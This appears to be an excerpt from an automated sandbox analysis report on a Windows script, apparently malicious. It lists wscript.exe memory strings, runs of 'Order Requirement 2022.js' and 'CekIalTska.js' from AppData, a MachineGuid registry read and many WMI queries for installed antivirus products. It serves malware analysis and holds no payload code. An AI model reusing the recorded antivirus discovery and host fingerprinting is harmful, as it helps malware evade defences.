Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_available
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_available
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_drivers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_drivers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_supportpolicy
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_supportpolicy
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: debug
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8debug
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: description
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: distributed
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringdistributed
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: encryptionlevel
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanencryptionlevel
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: foregroundapplicationboost
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32foregroundapplicationboost
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freephysicalmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8freephysicalmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freespaceinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64freespaceinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freevirtualmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64freevirtualmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: installdate
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64installdatee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: largesystemcache
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelargesystemcache
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lastbootuptime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32lastbootuptimee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: localdatetime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelocaldatetimee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: locale
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelocale
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: manufacturer
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringmanufacturer
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maxnumberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringmaxnumberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maxprocessmemorysize
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32maxprocessmemorysize
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: muilanguages
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64muilanguages
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberoflicensedusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringnumberoflicensedusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32numberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32numberofusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: operatingsystemsku
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32operatingsystemsku
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: organization
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32organization
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osarchitecture
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringosarchitecture
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oslanguage
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringoslanguage
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osproductsuite
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32osproductsuite
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ostype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8uint32ostype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: othertypedescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: guint16othertypedescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: paeenabled
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringpaeenabled
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: plusproductid
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanplusproductid
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: plusversionnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringplusversionnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: portableoperatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringportableoperatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: primary
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanprimary
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: producttype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanproducttype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: registereduser
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32registereduser
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: serialnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringserialnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: servicepackmajorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringservicepackmajorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: servicepackminorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16servicepackminorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizestoredinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16sizestoredinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: status
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64status
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdevice
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32systemdevice
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdirectory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringsystemdirectory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdrive
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringsystemdrive
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: desktop-716t771
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: computer!
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: athtosignedprodu
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: not_nul
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -9e44-da
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5-9e44-da
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: defender
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {082927ab-dedc-4263-82f9-82a923849650}
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}+
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1root\cimv2c
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32_operatingsystem{082927ab-dedc-4263-82f9-82a923849650}/
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: af_unixf
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [tcp/ip]2\mswsock.dll,-60100
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [udp/ip]2\mswsock.dll,-60101
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [raw/ip]2\mswsock.dll,-60102f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [tcp/ipv6]mswsock.dll,-60200
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [udp/ipv6]mswsock.dll,-60201
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd tcpip [raw/ipv6]mswsock.dll,-60202f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcpv6 service providers.dll,-100f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcp service providerqos.dll,-101&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp udpv6 service providers.dll,-102&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp udp service providerqos.dll,-103&
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hyper-v raw
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd irda [irda]
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32;c:\windows\system32;c:\windows\system;c:\windows;.;c:\program files (x86)\common files\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\appdata\local\microsoft\windowsapps;
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcp service provider9
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msafd irda [irda]f
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 202 (,
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7t;h0h<
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7$3t
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0|2l#89
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )\8t*
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d7l4d=
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8@1l$d=
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecuritycenterfication window
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecuritycenter
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: url moniker notification window
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rsvp tcpv6 service provider
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (<pdx
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $8l`t
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.862567864.00000228B31AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379605818.00000228B314F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.818173441.00000228B09F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379726865.00000228B3194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
